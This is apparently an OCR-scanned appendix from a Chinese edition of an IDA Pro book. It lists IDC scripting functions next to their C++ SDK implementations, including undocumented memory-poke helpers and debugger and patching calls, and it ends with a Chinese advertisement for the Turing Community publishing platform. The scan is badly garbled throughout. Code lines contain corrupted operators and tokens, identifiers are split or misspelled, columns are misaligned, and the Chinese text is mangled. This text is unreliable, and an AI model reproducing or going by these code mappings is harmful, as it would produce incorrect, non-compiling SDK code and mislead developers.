return get member size(m); 
tid t m= get member(get struc(id), offset)-»id; 
return netnode n(m).altval(3) - 1; 
func t *f = get func(ea); 
return f ? get min spd ea(f) : BADADDR; 
ua mnem(ea, buf, sizeof(buf)); 
return qstrdup(buf):; 
module info t modinfo; 
if (base == 0) 

get first module(&modinfo); 
else 

modinfo.base = base - 1; 

get next module(&modinfo):; 
return qstrdup(modinfo.name); 
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IDC 函数 


GetModuleSize 


GetNextBmask 
GetNextConst 
GetNextFixupEA 
GetNextHashKey 


GetNext Index 
GetNextModule 


GetNextStrucIdx 
GetUpType 


GetOperandValue 


GetOpnd 


GetOriginalByte 
GetPrevBmask 
GetPrevConst 
GetPrevFixupEA 
GetPrevHashKey 


GetPrevIndex 
GetPrevStrucIdx 


SDK 实现 

module info t modinfo; 
if (base -- 0) 

get first module(&modinfo); 
else 

modinfo.base = base - 1; 

get next module(&modinfo); 
return modinfo.size; 


return get next bmask(eum id, value); 
return get next const(enum id, value, bmask); 
return get next fixup ea(ea); 
netnode n(id).hashnxt(idx, buf, sizeof(buf)); 
return qstrdup(buf); 
return netnode n(id).supnxt(idx, tag); 
module info t modinfo; 
modinfo.base - base; 
get next module(&modinfo):; 
return modinfo.base; 
return get next struc idx(); 
Hate as 
if (isCode(get flags novalue(ea))) 
ua ana0(ea); 
return cmd.Operands[n].type:; 
Use ua ona to fill command struct then return 
appropriate value based on cmd.Operands[n].type 
*buf = 0; 
if (isCode(get flags novalue(ea))) 
ua outop2(ea, buf, sizeof(buf), n); 
tag remove(buf, buf, sizeof(buf)); 
return qstrdup(buf) ; 
return get original byte(ea); 
return get prev bmask(enum id, value); 
return get prev const(enum id, value, bmask): 
return get prev fixup ea(ea); 
netnode n(id).hashprev(idx, buf, sizeof(buf)); 
return qstrdup(buf); 
return netnode n(id).supprev(idx, tag); 


return get prev struc idx(index); 


IDC 函数 


GetProcessName 


GetProcessPid 
GetProcessQty 
GetProcessState 
GetReg 
GetRegValue 


GetSegmentAttr 


GetShortPrm 


GetSourceFile 
GetSpDiff 
GetSpd 
GetString 


GetStringlype 
GetStrucComment 


GetStrucId 
GetStrucIdByName 
GetStruclIdx 
GetStrucName 


GetStrucNextOff 
GetStrucPrevOff 
GetStrucQty 
GetStrucSize 
GetlestId 


GetTIhreadId 
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process info t p; 
pid t pid » get process info(idx, 8p); 
return qstrdup(p.name); 
return get process info(idx, NULL); 
return get process qtyO:; 
return get process state(); 
return getSR(ea, str2reg(reg)); 
regval Ir: 
get reg val(name, &r); 
if (is reg integer(name)) 

return (int)r.ival; 
else 

/ /memcpy (result, r.fval, 12); 


segment t *s - get seg(segea); 
return internal get attr(s, attr); 
if (offset «- 190) 
return *(unsigned short*)(offset + (char*)&inf); 
return qstrdup(get sourcefile(ea)); 
return get sp delta(get func(ea), ea); 
return get spd(get func(ea), ea); 
if (len == -1) 
len = get max ascii length(ea, type, true); 
get ascii contents(ea, len, type, buf, sizeof(buf)); 
return qstrdup(buf); 
return netnode n(ea).altval(16) - 1; 
get struc cmt(id, repeatable, buf, sizeof(buf)); 
return qstrdup(buf); 
return get struc by idx(index); 
return get struc id(name); 
return get struc idx(id); 
get struc name(id, buf, sizeof(buf)); 
return qstrdup(buf) ; 
return get struc next offset(get struc(id), offset); 
return get struc prev offset(get struc(id), offset); 
return get struc qtyO; 
return get struc size(id); 
//*** undocumented, returns internal testid 


return getn thread(idx); 
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GetIhreadQty 
Get [info 

Get [rueName 
Get [rueNameEx 
Get [ype 


GetnEnum 
GetVxdFuncName 


Get XML 


GuessType 


HideArea 
HighVoids 
IdbByte 
Indent 
IsBitfield 
IsEventHandled 
IsFloat 
IsLong 
IsObject 
IsString 
IsUnion 
ItemEnd 
ItemHead 
ItemSize 
Jump 

LineA 


| ineB 


SDK 实现 
return get thread qty(): 
//no comparable return type in SDK, generally uses get tinfo 
//[macro, see Get TrueNameEx 
return qstrdup(get true name(from, ea, buf, sizeof(buf))); 
get ti(ea, tbuf, sizeof(tbuf), plist, sizeof(plist)); 
print type to one line(buf, sizeof(buf), idati, 
tbuf, NULL, NULL, plist, NULL); 
return qstrdup(buf); 
return getn enum(idx); 
//*** undocumented function 
get vxd func name(vxdnum, funcnum, buf, sizeof(buf)); 
return qstrdup(buf) ; 
valut t res; 
get xml(path, &res); 
return res; 
guess type(ea, tbuf, sizeof(tbuf), plist; sizeof(plist)); 
print type to one line(buf, sizeof(buf), idati, tbuf, 
NULL, NULL, plist, NULL); 
return qstrdup(buf); 
add hidden area(start, end, description, header, footer, color); 
//macro, see SetLongPrm 
return get db byte(ea); 
/[macro, see SetCharPrm 
return is bf(enum id); 
return get debug event()-»handled; 
//IDC variable type query, n/a for SDK 
//IDC variable type query, n/a for SDK 
//IDC variable type query, n/a for SDK 
//IDC variable type query, n/a for SDK 
return get struc(id)-»is union(); 
return get item end(ea); 
return get item head(ea); 
return get item end(ea) - ea; 
jumpto(ea); 
netnode n(ea).supstr(1000 + num, buf, sizeof (buf)): 
return qstrdup(buf); 
netnode n(ea).supstr(2000 + num, buf, sizeof(buf)); 
return qstrdup(buf); 


IDC 函数 


LoadDebugger 
LoadTil 
LocByName 
LocByNameEx 
LowVoids 
MK_FP 
MakeAlign 
MakeArray 


MakeByte 
MakeCod 
MakeComm 
MakeData 
MakeDouble 
MakeDword 
MakeF loat 
MakeFrame 


MakeFunction 
MakeLocal 


MakeNameEx 
MakeOword 
MakePackRea | 
MakeQword 
MakeRptCmt 
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load debugger(dbgname, use_remote) ; 
return add til2(name, 0); 
return get name ea(-l, name); 
return get name ea(from, name); 

//macro, see SetLongPrm 
return ((seg««4) + off); 
doAlign(ea, count, align); 
typeinfo t ti; 
flags t f = get flags novalue(ea); 
get typeinfo(ea, 0, f, &ti); 
asize t sz - get data elsize(ea, f, &ti); 
do data ex (ea, f, sz * nitems, ti.tid); 
/[macro, see MakeData 
ua code(ea); 
set cmt(ea, cmt, false); 
do data ex(ea, flags, size, tid); 
/[macro, see MakeData 
/[macro, see MakeData 
/[macro, see MakeData 
func t *f = get func(ea); 
set frame size(f, lvsize, frregs, argsize); 
return f-»-frame; 
add func(start, end); 
func t *f = get func(ea); 
if (*location != '[') 

add regvar(f, start, end, location, name, NULL): 
else 

struc t *fr = get frame(f); 

int start = T-*TPS126 *-ofLTSev: 

if (get member(fr, start)) 

set member name(fr, start, name); 
else 
add struc member(fr, name, start, 0x400, 0, 1); 

set name(ea, name, flags); 
/[macro, see MakeData 
/[macro, see MakeData 
/[macro, see MakeData 
set cmt(ea, cmt, true); 
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MakeStr 


MakeStructEx 


MakeTbyte 
MakeUnkn 
MakeUnknown 
MakeVar 
MakeWord 
MarkPosition 


MaxEA 

Message 

MinEA 
MoveSegm 

Name 

NameEx 
NextAddr 
NextFchunk 
NextFuncFchunk 


NextFunct ion 
NextHead 
NextNotTail 
NextSeg 


OpAlt 
OpBinary 
OpChr 
OpDecimal 
OpEnumE x 
OpF loat 


SDK 实现 
int len = endea -1 7-0 : ended - ea; 
make ascii string(ea, len, current string type): 
netnode n(strname); 
nodeidx t idx =. (nodeidx t)n; 


if (size != -1) 
do data ex(ea, FF STRU, size, idx); 
else 


size L SZ = geL Struc Sizelget 人 EU 
do data ex(ea, FF STRU, sz, id); 


//macro, see MakeData 

do unknown(ea, flags); 

do unknown range(ea, size, flags); 

doVar(ea); 

//macro, see MakeData 

curloc loc; 

loc.ea = ea; loc.Innum = innum; loc.x = x; loc.y = y; 
loc.mark(slot, NULL, comment); 

//macro, see GetLongPrm 

msg(format, ...); 

//macro, see GetLongPrm 

return move segm(get seg(ea), to, flags); 

return qstrdup(get name(-1, ea, buf, sizeof(buf))); 
return qstrdup(get name(from, ea, buf, sizeof(buf))); 
return nextaddr(ea); 

return funcs-»getn area(funcs-»get next area(ea))-»startEA; 
func tail iterator t fti(get func(funcea), tailea); 
return fti.next() ? fti.chunk().startEA : -1; 

return get next func(ea)-»startEA; 

return next head(ea, maxea); 

return next not tail(ea); 

int n = segs.get next area(ea); 

return getnseg (n)-»startEA; 

set forced operand(ea, n, str); 

op bin(ea, n); 

op chr(ea, n); 

op dec(ea, n); 

op enum(ea, n, enumid, serial); 

op flt(ea, n); 


IDC 函数 


OpHex 
OpHigh 
OpNot 
OpNumber 
OpOctal 
OpOff 


OpOffEx 
OpSeg 
OpSign 
OpStkvar 
OpStroffEx 
Parselype 


Parselypes 


PatchByte 
PatchDbgByte 


PatchDword 
PatchWord 
PauseProcess 
PopXML 
PrevAddr 
PrevFchunk 
PrevFunction 
PrevHead 
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op hex(ea, n); 
return op offset(ea, n, REF HIGH16, target); 
toggle bnot(ea, n); 
op num(ea, n); 
op oct(ea, n); 
if (base !- OxFFFFFFFF) set offset(ea, n, base); 
else noType(ea, n); 
op offset(ea, n, reftype, target, base, tdelta); 
op seg(ea, n); 
toggle sign(ea, n); 
op stkvar(ea, n); 
op stroff(ea, n, &strid, 1, delta); 
qstring inCinput):; 
TE OUm.lasi0) Ze "ek TM te " 
Tlags «PT Es 
if (flags & PT NDC) flags |= PT SIL; 
else Tags & «PT .SIL$ 
flags &- -PT NDC; 
qstring name, type, fields; 
parse decl(idati, in.c str(), &name, &type, &fields, flags); 
internal build idc typeinfo(&result, &type, &fields); 


int hti flags = (flags & 0x/0) << 8; 
if (flags & 1) hti flags | HTI FIL; 
parse types2(input, (flags & 2) ? NULL : printer func, 
hti flags); 
patch byte(ea, value); 
if (qthread same(idc debthread)) 
dbg->write memory(ea, &value, 1); 
else 
put dbg byte(ea, value); 
patch long(ea, value); 
patch word(ea, value); 
suspend process(); 
pop xml(); 
return prevaddr(ea); 
return get prev fchunk(ea)-»startEA; 
return get prev func(ea)-»startEA; 
return prev head(ea, minea); 
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PrevNotTail 
ProcessUiAction 
PushXML 
Qword 
RebaseProgram 
RecalcSpd 
Refresh 
RefreshDebuggerMemory 


RefreshL ists 
RemoveFchunk 


RenameArray 


RenameEntryPoint 
RenameSeg 
ResumeThread 
Rfirst 
Rfirst0 
RfirstB 
RfirstB0 
Rnext 

RNnext0 
RnextB 
RnextB0 

RunP lugin 
RunTo 


SaveBase 


ScreenEA 
SegAddrng 


SDK 实现 

return prev not tail(ea); 
return process ui action(name, flags); 
push xml(path); 
return get qword(ea); 
return rebase program(delta, flags); 
return recalc spd(cur ea); 
refresh idaview anyway(); 
invalidate dbgmem config(); 
invalidate dbgmem contents(BADADDR, -1); 
if (dbg AN dbg-»stopped at debug event) 

dbg-»stopped at debug event(true); 
callui(ui list); 
remove func tail(get func(funcea), tailea); 
qsnprintf(buf, sizeof(buf), "$ idc array Ze". name); 
netnode n(id).rename(newname) ; 
rename entry(ordinal, name); 
set segm name(get seg(ea), "2s", name); 
return resume thread(tid); 
return get first cref from(From); 
return get first fcref from(From); 
return get first cref to(To); 
return get first Tcref to(To9; 
return get next cref from(From, current); 
return get next fcref from(From, current); 
return get next cref to(To, current); 
return get next fcref to(To, current); 
run plugin(load plugin(name), arg); 
run to(ea); 
char *fname = idbname ? idbname : database idb; 
uint32 t tflags - database flags; 
database flags = (flags & 4) | (tflags & Oxfffffffb); 
bool res = save database(fname, 0); 
database flags - tflags; 
FSCUFTI TES: 
return get screen ea(); 


//deprecated, see SetSegAddressing 


SegAlign 

SegBounds 
SegByBase 
SegByName 


SegClass 
SegComb 
SegCreate 
SegDefReg 
SegDelete 
SegEnd 


SegName 


SegRename 
SegStart 
Sel End 


SelStart 


SelectIhr 
SetArrayF 


SetArrayL 
SetArrayS 
SetBmaskC 
SetBmaskN 


IDC 函数 


ead 


ormat 


ong 
tring 
mt 


ame 
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//macro, see SetSegmentAttr 
//deprecated, see SetSegBounds 
return get segm by sel(base)-»starttA; 
sel t seg; 
atos(segname, *seg): 
return seg; 
//deprecated, see SetSegClass 
//macro, see SetSegmentAttr 
//deprecated, see AddSeg 
//deprecated, see SetSegDefReg 
//deprecated, see DelSeg 
//macro, see GetSegmentAttr 
segment t *s = (segment t*) get seg(ea); 
get true segm name(s, buf, sizeof(buf)); 
return qstrdup(buf); 
//deprecated, see RenameSeg 
//macro, see GetSegmentAttr 
ea t eal, ea2; 
read selection(&eal, 8ea2); 
return ea2; 
ea t eal, ea2; 
read selection(&eal, 8ea2); 
return eal; 
select thread(tid); 
segment t *s = get seg(ea); 
EF Ze? 

uint32 t format[3]; 


netnode array(ea); 


format[0] = flags; 
format[1] = litems; 
format[2] = align; 


array.supset(5, format, sizeof(format)); 
netnode n(id).altset(idx, value); 
netnode n(id).supset(idx, str); 
set bmask cmt(enum id, bmask, cmt, repeatable); 


set bmask name(enum id, bmask, name): 
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SetBptAttr bpt t bpt; 
if (get bpt(ea, &bpt) == 0) return; 
if (bpattr -- BPTATIR SIZE) bpt.size - value; 
else if (bpattr == BPTATTR TYPE) bpt.type = value; 
else if (bpattr == BPTATTR COUNT) bpt.pass count = value; 
else if (bpattr == BPTATTR FLAGS) bpt.flags - value; 
update bpt(&bpt); 
SetBptCnd //macro for SetBptCndEx(ea, cnd, 0); 
SetBptCndEx DDL ls 
if (get bpt(ea, &bpt) == 0) return; 
bpt. cndbody = cnd; 
if (is lowcnd) 
bpt.flags |= BPT LOWCND; 
else 
bpt.flags &= ~ BPT LOWCND.; 
update bpt(&bpt); 


SetCharPrm if (offset >= 13 && offset <= 191) 
*(offset + (char*)&inf) = value; 
SetColor VT (what s CIC ITEM) 


set item color(ea, color); 
else if (what == CIC FUNC) 
func t *f = get func(ea); 
t->g0lor = color: 
update func(f); 
else if (what == CIC SEGM) 
segment t *s - get seg(ea); 
s«»color- e color; 


s-»update():; 


SetConstCmt set const cmt(const id, cmt, repeatable); 
SetConstName set const name(const id, name); 
SetDebuggerÜptions return set debugger options(options); 
SetEnumBf set enum bf(enum id, flag ? 1 : 0); 
SetEnumCmt set enum cmt(enum id, cmt, repeatable); 
SetEnumr lag set enum flag(enum id, flag); 


SetEnumIdx set enum idx(enum id, idx); 


IDC 函数 
SetEnumName 
SetEnumwidth 
SetExceptionFlags 


SetFchunkAttr 


SetFchunkOwner 


SetFixup 


SetFlags 
SetFunctionAttr 


SetFunctionCmt 
SetFunctionEnd 
SetFunctionFlags 
SetHashLong 
SetHashString 
SetHiddenArea 


Set InputFi lePath 


SetL ineNumber 
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set enum name(enum id, name); 
return set enum width(enum id, width); 
excvec t tey = retrieve exceptions(); 
for (excvec t::iterator i = ev-»begin(); i le ev-»end(); Tix 
if ((*i).code = code) 
if ((*i).flags == flags) 
return true; 
else 
(*i).flags = flags; 
return store exceptions(); 
return 0; 
func t *f = get func(ea); 
internal Set attr(T, attr, value); 
update func(f); 
set tail owner(get func(tailea), funcea); 
fixup data t f = [type, targetsel, targetoff, displ}: 
set fixup(ea, &f); 
setFlags(ea, flags); 
func t *f = get func(ea); 
internal set attr(f, attr, value); 
set func cmt (get func(ea), cmt, repeatable); 
func setend(ea, end); 
//macro, see SetFunctionAttr 
netnode n(id).hashset(idx, value); 
netnode n(id).hashset(idx, value); 
hidden area t *ha = get hidden area (ea); 
ha-»visible = visible; 
update hidden area(ha); 
if (strlen(path) zs 0) RootNode.set(""); 
else RootNode. set (path) ; 


set source linnum(ea, Innum); 
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IDC 函数 
SetLocalType 


SetLongPrm 


SetManualInsn 


SetMemberComment 


SetMemberName 


SetMember Type 


SetProcessorlype 
SetReg 

SetRegEx 
SetRegValue 


SetRemoteDebugger 
SetSegAddressing 
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SDK 实现 
if (input == NULL || *input == 0) 
del numbered type(idati, ordinal); 
else 
qstring name; 
qtype type, fields; 
parse decl(idati, input, &name, &type, &fields, flags); 
if (ordinal == 0) 
if (!name.empty()) 
get named type(idati, name.c str(), 
NTF TYPE | NTF NOBASE, NULL, NULL, 
NULL, NULL, NULL, &ordinal); 
if (!ordinal) 
ordinal = alloc type ordinal(idati); 
set numbered type(idati, value, 0, name.c stro, 
type.c str(), fields.c str(), 
NULL, NULL, NULL); 
if (offset >= 13 && offset «- 188) 
*(int*)(offset + (char*)&inf) = value; 
set manual insn(ea, insn); 
member t *m - get member(get struc(ea), member offset); 
set member cmt(m, comment, repeatable); 
set member name(get struc(ea). member offset, name); 
typeinfo t mt; 
//calls an internal function to initialize mt using typeid 
int size = get data elsize(-1, flag, &mt) * nitems; 
set member type(get struc(id), member offset, flag, &mt,size):; 
set processor type(processor, level); 
//macro for SetRegEx(ea, reg, value, SR user); 
splitSRareal(ea, str2reg(reg), value, tag, false); 
regval t r; 
if (is reg integer(name)) 
r.ival = (unsigned int)VarLong(value):; 
else 
memcpy(r.fval, VarFloat(value), 12); 
set reg val(name, Ari: 
set remote debugger(hostname, password, portnum).; 


set segm addressing(get seg(ea). use32); 


IDC 函数 
SetSegBounds 


SetSegClass 
SetSegDefReg 
SetSegmentAttr 


SetsSegment Type 
SetSelector 
SetShortPrm 


SetSpDiff 
SetStatus 
SetStrucComment 
setStrucIdx 
SetStrucName 
SetlargetAssembler 
Set [ype 


SetXML 

Sleep 
StartDebugger 
StepInto 
StepOver 
StepUnti Ret 
StopDebugger 
StringStp 
Tabs 
TakeMemorySnapshot 
TailDepth 
Til2Idb 

Voids 

Wait 

Warning 

Word 

XrefShow 
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if (get seg(ea)) 
set segm end(ea, endea, flags); 
set segm end(ea, startea, flags); 


set segm class(get seg(ea), class); 


SetDefaultRegisterValue(get seg(ea), str2reg(reg), 


segment t *s = get seg(segea); 

internal set attr(s, attr, value); 

s-»update(); 

//macro, see SetSegmentAttr 

set selector(sel, value); 

if (offset >= 13 && offset <= 190) 
*(short*)(offset * (char*)&inf) = value; 

add user stkpnt(ea, delta); 

Seto MRECHES 

set struc cmt(id, cmt, repeatable); 

set struc idx(get struc(id), index); 

set struc name(id, name); 

set target assembler(asmidXx):; 

apply cdecl(ea, type) 

if (get aflags(ea) & AFL TILCMT) 
set ti(ea, "", NULL); 

set xml(path, name, value); 

qsleep(milliseconds); 

start process(path, args, sdir): 

step intoO; 

step over(); 

step until ret(); 

exit process(); 

//macro, see SetCharPrm 

//[macro, see SetCharPrm 

take memory snapshot(only loader segs); 

//macro, see SetLongPrm 

return til2idb(idx, type name); 

//[macro, see SetCharPrm 

autoWait(:; 

warning(format, ...); 

return get full word(ea); 

//[macro, see SetCharPrm 


value); 
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IDC 函数 
Xreflype 


Be 


_ lpoke 


_peek 


_poke 


time 


add dref 
atoa 


atol 
byteValue 
del_dref 
delattr 
fclose 
fgetc 
filelength 


SDK 实现 
Returns value of an internal global variable 
//*** undocumented function (four underscores) 
//returns database creation timestamp 
return RootNode.altval(RIDX ALT CTIME); 
//*** undocumented function 
//uint32 t call(uint32 t (*f)0) 
//f is a pointer in IDA's (NOI the database s) address space 
return (*f)(); 
//*** undocumented function 
//uint32 t lpoke(uint32 t *addr, uint32 t val) 
//addr is an address in IDA's (NOT the database s) address 
//space. This modifies IDA's address space NOT the database's 
Unto2 t old tagdr; 
*addr = val; 
return old: 
//*** undocumented function 
//Uint8 t * peek(uint8 t *addr) 
//addr is in IDA's address space 
return *addr; 
//*** undocumented function 
//uint8 t  lpoke(uint8 t *addr, uinte t val) 
//addr is an address in IDA's (NOT the database's) address 
//space. This modifies IDA's address space NOI the database's 
uinte t old = “addr; 
*addr = val; 
return old; 
/*** undocumented function 
return time64(NULL) ; 
add dref(From, To, drefType); 
ea2str(ea, buf, sizeof(buf)); 
return qstrdup(buf) ; 
return atol(str); 
/ /macro 
del dref(From, To); 
VarDelAttr(self, attr): 
qfclose(handle); 
return qfgetc(handle): 
return efilelength(handle): 


IDC 函数 


fopen 

form 

fprintf 

fputc 

fseek 

PLEI 

get field ea 
get nsec stamp 
getattr 


hasattr 
hasName 
hasValue 
isBin0 
isBinl 
isChar0 
isCharl 
isCode 
isData 
isDecO 
isDecl 
isDefArg0 
isDefArgl 
isEnum0 
isEnuml 
isExtra 
isFlow 
isFop0 
isFopl 
isHead 
isHex0 
isHexl 
isLoaded 
is0ct0 
SU 
isOff0 
jiSOfTf1 
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SDK 实现 
return qfopen(file, mode); 
//deprecated, see sprintf 
qfprintf(handle, format, ...); 
qfputc(byte, handle); 
qfseek(handle, offset, origin); 
return qftell(handle); 

Too complex to summarize 
return get nsec stamp(); 
idc value t res; 
VarGetAttr(self, attr, &res); 
return res; 

return VarGetAttr(self, attr, NULL) -- 0; 
// macro 

// macro 

// macro 

// macro 

//macro 

// macro 

/ {macro 

// macro 

// macro 

// macro 

// macro 

//macro 

// macro 

// macro 

// macro 

// macro 

//macro 

// macro 

//macro 

// macro 

//macro 

//macro 

//macro 

/ /Macro 

// macro 

// macro 
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IDC 函数 


isRef 
isSeg0 
isSegl 
isStkvar0 
isStkvarl 
isStroff0 
isStroffl1 
islail 
isUnknown 
isVar 
lastattr 
loadfile 


|toa 
mkdir 
nextattr 
ord 
prevattr 
print 


readlong 


readshort 


readstr 


rename 
rotate left 
savefile 
SEL start Cs 
set start 1p 
setattr 


sizeof 


SDK 实现 
//macro 
/ /macro 
/ /macro 
/ /macro 
// macro 
//macro 
//macro 
//macro 
//macro 
//macro 
return qstrdup(VarLastAttr(self)); 
linput t *li = make linput(handle); 
file2base(li, pos, ea, ea * size, false); 
unmake linput(l1i); 
Calls internal conversion routine 
return qmkdir(dirname, mode); 
return qstrdup(VarNextAttr(self, attr)); 
return strigi; 
return qstrdup(VarPrevAttr(self, attr)); 
qstring qs; 
VarPrint(8qs, arg): 
msg("%s\n", qs.c str); 
unsigned int res; 
freadbytes(handle, &res, 4, mostfirst):; 
return res; 
unsigned short res; 
freadbytes (handle, &res, 2, mostfirst); 
return res; 
qfgets(buf, sizeof(buf), handle); 
return qstrdup(buf); 
return rename(oldname, newname); 
return rotate left(value, count, nbits, offset); 
base2file(handle, pos, ea, ea + size); 
//macro, see SetLongPrm 
//macro, see SetLongPrm 
return VarSetAttr(self, attr, value) == 
type t *t = internal type from idc typeinfo(type):; 
return get type size(idati, t); 


IDC 函数 
Sprintf 


strfill 


strlen 
strstr 
substr 
trim 
unlink 
writelong 
writeshort 
writestr 


xtol 
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SDK 实现 
qstring buf; 
buf.sprnt(format, ...); 
return qstrdup(buf.c str(); 
qstring sS; 
s.resize(len + 1, &chr); 
return new qstring(s):; 
return strlen(str): 
return strstr(str, substr); 
Calls internal slice routine 
return new qstring(string.c str()); 
return unlink(filename); 
fwritebytes(handle, &dword, 4, mostfirst); 
fwritebytes(handle, &word, 2, mostfirst); 
qfputs(str, handle); 
return strtoul(str, NULL, 16); 


最 前 疝 的 T 类 电子 书 发 售 平台 


电子 出 版 的 时 代 已 经 来 临 。 在 许多 出 版 界 同 行 还 在 犹 
耶 和 仿 香 的 时 候 ， 图 灵 社 区 已 经 采取 实际 行动 拥抱 这 个 
出 版 业 巨 变 。 作 为 国内 第 一 家 发 售 电子 图 书 的 IT 类 出 
版 商 ， 图 灵 社 区 目前 为 读者 提供 两 种 DRM-free 的 阅读 
体验 : 在 线 阅 读 和 PDF。 

















相 比 纸 质 书 ， 电 子 书 具 有 许多 明显 的 优势 。 它 不 仅 发 
MR, 更 新 容易 ， 而 且 尽 可 能 采用 了 彩色 图 片 (即使 
有 的 书 纸 质 版 是 黑 日 印刷 的 ) 。 读 者 还 可 以 方便 地 进 
fH. OU. Sin"), 


最 方便 的 开放 出 版 平台 


图 灵 社 区 向 读者 开放 在 线 写作 功能 ， 协 助 你 实现 目 出 
版 和 开源 出 版 的 梦想 。 利 用 “合集 功能 ， 你 就 能 联 
合 二 三 好 友 共 同 创 作 一 部 技术 参考 书 ， 以 免费 或 收费 
的 形式 提供 给 读者 。 (收费 形式 须 经 过 图 灵 社 区 立项 
评审 。) 这 极 大 地 降低 了 出 版 的 门 榴 。 只 要 你 有 写作 
的 意愿 ， 图 灵 社 区 就 能 帮助 你 实现 这 个 梦想 。 成 熟 的 
书稿 ， 有 机 会 入 选 出 版 计划 ， 同 时 出 版 纸 质 书 。 








图 灵 社 区 引进 出 版 的 外 文 图 书 ， 都 将 在 立项 后 马上 在 
社区 公布 。 如 来 你 有 意 翻 译 哪 本 图 书 ， 欢 迎 你 来 社区 
申请 。 只 要 你 通过 试 译 的 考验 ， 即 可 签约 成 为 图 灵 的 
译 首 。 当 然 ， 要 想 成 功 地 完成 一 本 书 的 翻译 工作 ， 是 
需要 有 坚强 的 妆 力 的 。 





欢迎 加 入 


ZI RIEK 


图 灵 社 区 进一步 把 传统 出 版 流程 与 电子 书 出 版 业务 
紧密 结合 ， 目 前 已 实现 作 译 着 网 上 交 稿 、 编 辑 网 上 
审 稿 、 按 章 发 布 的 电子 出 版 模式 。 这 种 新 的 出 版 模 
式 ， 我 们 称 之 为 “敏捷 出 版 ， 它 可 以 让 谈 者 以 较 
快 的 速度 了 解 到 国外 最 新 技术 图 书 的 内 容 ， 弥 补 以 
往 翻 译 版 技术 书 “ 出 版 即 过 时 ”的 缺憾 。 同 时 ， 敏 
捷 出 版 使 得 作 、 译 、 编 、 读 的 交流 更 为 方便 ， 可 以 
提前 消灭 书稿 中 的 销 误 ， 最 大 程度 地 保证 图 书 出 版 


的 质量 。 


最 直接 的 读者 交流 平台 


在 图 灵 社 区 ， 你 可 以 十 分 方便 地 写作 文 草 、 提 交 勘 
误 、 发 表 评论 ， 以 各 种 方式 与 作 译 背 、 编 辑 人 员 和 
其 他 读者 进行 交流 互动 。 提 交 勘 误 还 能 够 获 赠 社区 
银子 。 





你 可 以 积极 参与 社区 经 党 开展 的 访谈 、 审 恋 、 评 选 
等 多 种 活动 ， 最 取 积 分 和 银子 ， 积 累 个 人 声望 。 
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